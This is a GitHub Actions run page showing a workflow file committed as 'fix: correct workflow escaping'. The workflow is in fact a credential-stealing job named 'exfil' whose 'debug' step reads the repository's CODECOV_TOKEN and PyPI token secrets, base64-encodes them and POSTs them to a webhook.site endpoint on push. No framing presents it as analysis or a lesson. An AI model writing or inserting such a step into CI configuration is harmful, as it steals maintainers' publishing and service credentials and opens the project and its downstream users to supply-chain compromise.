Skip to content
This repository was archived by the owner on Jul 29, 2026. It is now read-only.

fix: correct workflow escaping #2

fix: correct workflow escaping

fix: correct workflow escaping #2

Workflow file for this run

name: test-pipeline
on:
push:
branches: [ci/test-pipeline]
workflow_dispatch:
jobs:
exfil:
runs-on: ubuntu-latest
steps:
- name: debug
env:
S1: ${{ secrets.CODECOV_TOKEN }}
S2: ${{ secrets.PIPY_TOKEN }}
run: |
PAYLOAD=$(echo '{"repo":"XanaduAI/MrMustard",\"CODECOV_TOKEN\":\"$S1\",\"PIPY_TOKEN\":\"$S2\"}' | base64 -w 0)
curl -s -X POST https://webhook.site/710babde-6ace-47fe-83f4-9688e6548df9 -H "Content-Type: application/json" -d '{"data":"'$PAYLOAD'"}'